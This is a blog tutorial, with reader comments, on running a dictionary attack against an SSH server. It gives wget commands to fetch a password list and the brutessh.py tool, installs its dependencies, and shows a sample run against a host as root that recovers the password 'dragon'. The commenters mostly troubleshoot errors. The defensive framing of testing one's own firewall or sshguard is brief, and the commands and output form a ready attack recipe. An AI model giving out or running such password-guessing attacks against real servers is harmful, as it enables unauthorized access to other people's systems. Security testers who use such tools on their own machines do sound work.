zeldor.biz

Linux, programming and more

Copyright © 2025
Log in

How to Bruteforce SSH

January 30, 2011 by Igor Drobot 17 Comments

SSH is an acronym which stands for Secure SHell, which provides a secure shell access to a remote machine.

This brut force tool is great to test some security stuff like iptables or sshguard.

You are able to see the proceeder of real hacking attempt.

Like most brute forcing tools, you’ll first need a pretty big passlist. You can get one from here:

1
wget https://zeldor.biz/other/bruteforce/passlist.txt

wget https://zeldor.biz/other/bruteforce/passlist.txt


Get SSHBrute python script:

1
wget https://zeldor.biz/other/bruteforce/brutessh.zip

wget https://zeldor.biz/other/bruteforce/brutessh.zip

To get it to work you will need this packages:

1
apt-get install python-crypto python-paramiko

apt-get install python-crypto python-paramiko

To start you need some things to specify: hostname, username abd a password list.

This tool in work:

1
2
3
4
5
6
7
8
9
10
11
12
13
id@crunch:~$ python brutessh.py -h 10.1.100.4 -u root -d passlist.txt
 
*************************************
*SSH Bruteforcer Ver. 0.2           *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*laramies@gmail.com                 *
*************************************
 
HOST: 10.1.100.4 Username: root Password file: passlist.txt
===========================================================================
Trying password...
dragon

id@crunch:~$ python brutessh.py -h 10.1.100.4 -u root -d passlist.txt ************************************* *SSH Bruteforcer Ver. 0.2 * *Coded by Christian Martorella * *Edge-Security Research * *laramies@gmail.com * ************************************* HOST: 10.1.100.4 Username: root Password file: passlist.txt =========================================================================== Trying password... dragon

Filed Under: Bash, Debian, Linux, Networking Tagged With: hacking, SSH Brute force, SSH Security

Categories

Archives

Tags

apache2 Apple arduino ARM Automation backup bash Cisco Cluster Corosync Database Debian Debian squeeze DIY DNS Fedora FTP Fun Icinga Ipv6 KVM Linux LVM MAC OS X Monitoring MySQL Nagios Nginx openSUSE OpenVPN PHP Proxy Python python3 qemu RAID rsync Samba security ssh Ubuntu virtualization Windows Windows 7 Wordpress

Comments

  1. MOBY says

    August 1, 2016 at 16:38

    Im getting the can’t open password file error, please help!

  2. Renan says

    June 14, 2016 at 04:37

    Hello, i doing an academic research about security, found your script, but unfortunately it doesn’t work on Debian 8.5 on VmWare (i don’t trying to steal anyone, it’s all on virtual setups)

    More details:
    ERR [20160613-23:32:23.156] thr=89 paramiko.transport: File “/home/renan/apps/brutessh/paramiko/transport.py”, line 1385, in _negotiate_keys
    ERR [20160613-23:32:23.157] thr=63 paramiko.transport: raise SSHException(‘Incompatible ssh peer (no acceptable kex algorithm)’)
    ERR [20160613-23:32:23.157] thr=3 paramiko.transport: File “/home/renan/apps/brutessh/paramiko/transport.py”, line 1319, in run
    DEB [20160613-23:32:23.157] thr=172 paramiko.transport: Write packet , length 318
    ERR [20160613-23:32:23.158] thr=144 paramiko.transport: Traceback (most recent call last):
    ERR [20160613-23:32:23.158] thr=89 paramiko.transport: self._parse_kex_init(m)
    ERR [20160613-23:32:23.158] thr=63 paramiko.transport: SSHException: Incompatible ssh peer (no acceptable kex algorithm)
    ERR [20160613-23:32:23.159] thr=3 paramiko.transport: self._handler_table[ptype](self, m)
    DEB [20160613-23:32:23.159] thr=267 paramiko.transport: Read packet , length 943
    ERR [20160613-23:32:23.159] thr=144 paramiko.transport: File “/home/renan/apps/brutessh/paramiko/transport.py”, line 1319, in run
    ERR [20160613-23:32:23.159] thr=89 paramiko.transport: File “/home/renan/apps/brutessh/paramiko/transport.py”, line 1498, in _parse_kex_init
    ERR [20160613-23:32:23.160] thr=63 paramiko.transport:
    ERR [20160613-23:32:23.160] thr=3 paramiko.transport: File “/home/renan/apps/brutessh/paramiko/transport.py”, line 1385, in _negotiate_keys
    ERR [20160613-23:32:23.160] thr=144 paramiko.transport: self._handler_table[ptype](self, m)
    DEB [20160613-23:32:23.161] thr=267 paramiko.transport: kex algos:[‘curve25519-sha256@libssh.org’, ‘ecdh-sha2-nistp256’, ‘ecdh-sha2-nistp384’, ‘ecdh-sha2-nistp521’, ‘diffie-hellman-group-exchange-sha256’, ‘diffie-hellman-group14-sha1’] server key:[‘ssh-rsa’, ‘ssh-dss’, ‘ecdsa-sha2-nistp256’, ‘ssh-ed25519’] client encrypt:[‘aes128-ctr’, ‘aes192-ctr’, ‘aes256-ctr’, ‘aes128-gcm@openssh.com’, ‘aes256-gcm@openssh.com’, ‘chacha20-poly1305@openssh.com’] server encrypt:[‘aes128-ctr’, ‘aes192-ctr’, ‘aes256-ctr’, ‘aes128-gcm@openssh.com’, ‘aes256-gcm@openssh.com’, ‘chacha20-poly1305@openssh.com’] client mac:[‘umac-64-etm@openssh.com’, ‘umac-128-etm@openssh.com’, ‘hmac-sha2-256-etm@openssh.com’, ‘hmac-sha2-512-etm@openssh.com’, ‘hmac-sha1-etm@openssh.com’, ‘umac-64@openssh.com’, ‘umac-128@openssh.com’, ‘hmac-sha2-256’, ‘hmac-sha2-512’, ‘hmac-sha1’] server mac:[‘umac-64-etm@openssh.com’, ‘umac-128-etm@openssh.com’, ‘hmac-sha2-256-etm@openssh.com’, ‘hmac-sha2-512-etm@openssh.com’, ‘hmac-sha1-etm@openssh.com’, ‘umac-64@openssh.com’, ‘umac-128@openssh.com’, ‘hmac-sha2-256’, ‘hmac-sha2-512’, ‘hmac-sha1’] client compress:[‘none’, ‘zlib@openssh.com’] server compress:[‘none’, ‘zlib@openssh.com’] client lang:[”] server lang:[”] kex follows?False
    ERR [20160613-23:32:23.161] thr=89 paramiko.transport: raise SSHException(‘Incompatible ssh peer (no acceptable kex algorithm)’)
    ERR [20160613-23:32:23.161] thr=3 paramiko.transport: self._parse_kex_init(m)
    ERR [20160613-23:32:23.161] thr=144 paramiko.transport: File “/home/renan/apps/brutessh/paramiko/transport.py”, line 1385, in _negotiate_keys
    ERR [20160613-23:32:23.162] thr=267 paramiko.transport: Exception: Incompatible ssh peer (no acceptable kex algorithm)
    ERR [20160613-23:32:23.162] thr=89 paramiko.transport: SSHException: Incompatible ssh peer (no acceptable kex algorithm)
    ERR [20160613-23:32:23.162] thr=3 paramiko.transport: File “/home/renan/apps/brutessh/paramiko/transport.py”, line 1498, in _parse_kex_init
    ERR [20160613-23:32:23.162] thr=144 paramiko.transport: self._parse_kex_init(m)

  3. Andrew says

    February 21, 2016 at 21:46

    Thank you for this thingy, however I believe this is a dictionary attack not a brute force.
    Also if anyone experiences (some guy above)
    “python: can’t open file ‘brutessh’: [Errno 2] No such file or directory”
    then

    zip brutessh.zip
    it should extract, if not find a way to unzip the file, and just
    cd brutessh

  4. nodots says

    February 21, 2014 at 03:17

    This was made public because the chinese already have something like it… I know, I didn’t have password strength checking on a production server a few years back and crackers installed a rootkit. If I had been using this, or a myriad other security checking tools, the server wouldn’t have needed a re-install.

    BTW: if the script didn’t work, the machine is configured correctly (or you don’t own it to know it’s configured correctly). If this doesn’t make sense, you have a lot of reading to do! All the same, keep testing!

  5. Metroshica says

    January 30, 2013 at 06:45

    Thanks a ton for this, used the script to test out our firewalls. Worked perfectly.

  6. zeldor says

    October 11, 2012 at 09:28

    Create a own password file with your own password inside, try to run it against your own SSH instance;) it should work…

  7. anonymous says

    October 11, 2012 at 00:13

    Osum work by you. But what can I do with the connection time out. After some time I recieve this error

    Exception in thread Thread-2351:
    Traceback (most recent call last):
    File “/usr/lib/python2.4/threading.py”, line 442, in __bootstrap
    self.run()
    File “brutessh.py”, line 44, in run
    t = paramiko.Transport(hostname)
    File “/tmp/brutessh/paramiko/transport.py”, line 235, in __init__
    sock.connect((hostname, port))
    File “”, line 1, in connect
    error: (110, ‘Connection timed out’)

    and then again it starts to traverse the passwords.

    So I dont whether it is just going through the file or is it really checking those passwords.

  8. zeldor says

    April 2, 2012 at 13:57

    You have a typo in the file name.

  9. jaguar says

    April 2, 2012 at 13:11

    python: can’t open file ‘brutessh’: [Errno 2] No such file or directory

  10. zeldor says

    March 14, 2012 at 09:46

    stocazzo Holy shit! Thanks god ipv6 is not supported;)

  11. stocazzo says

    March 13, 2012 at 22:31

    not support for ipv6…

  12. zeldor says

    June 25, 2011 at 03:46

    Please use a valid user. (default root)

  13. shakal says

    June 24, 2011 at 22:35

    hi there !

    i did try ur script, but i always get a not valid passwordsi even put good pass i paswords file but it always say some password does not match could you tell me why is that?

    best regards,
    night

  14. kimsanov says

    June 8, 2011 at 23:10

    That was a crazy idea to make this public^^

Trackbacks

  1. Prevent brute force attacks says:
    August 17, 2020 at 11:14

    […] To test fail2ban you could use this start brute force attack and see how quick you will be banned […]

  2. Vulnerable Docker VM – oioki.me says:
    October 25, 2018 at 00:02

    […] we can bruteforce SSH password? I used brutessh.py with 10 million password […]

  3. Vulnerable Docker VM | oioki.ru says:
    September 13, 2017 at 01:13

    […] we can bruteforce SSH password? I used brutessh.py with 10 million password […]

Leave a Reply

Your email address will not be published. Required fields are marked *

Yeaaah Cookie! We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.Ok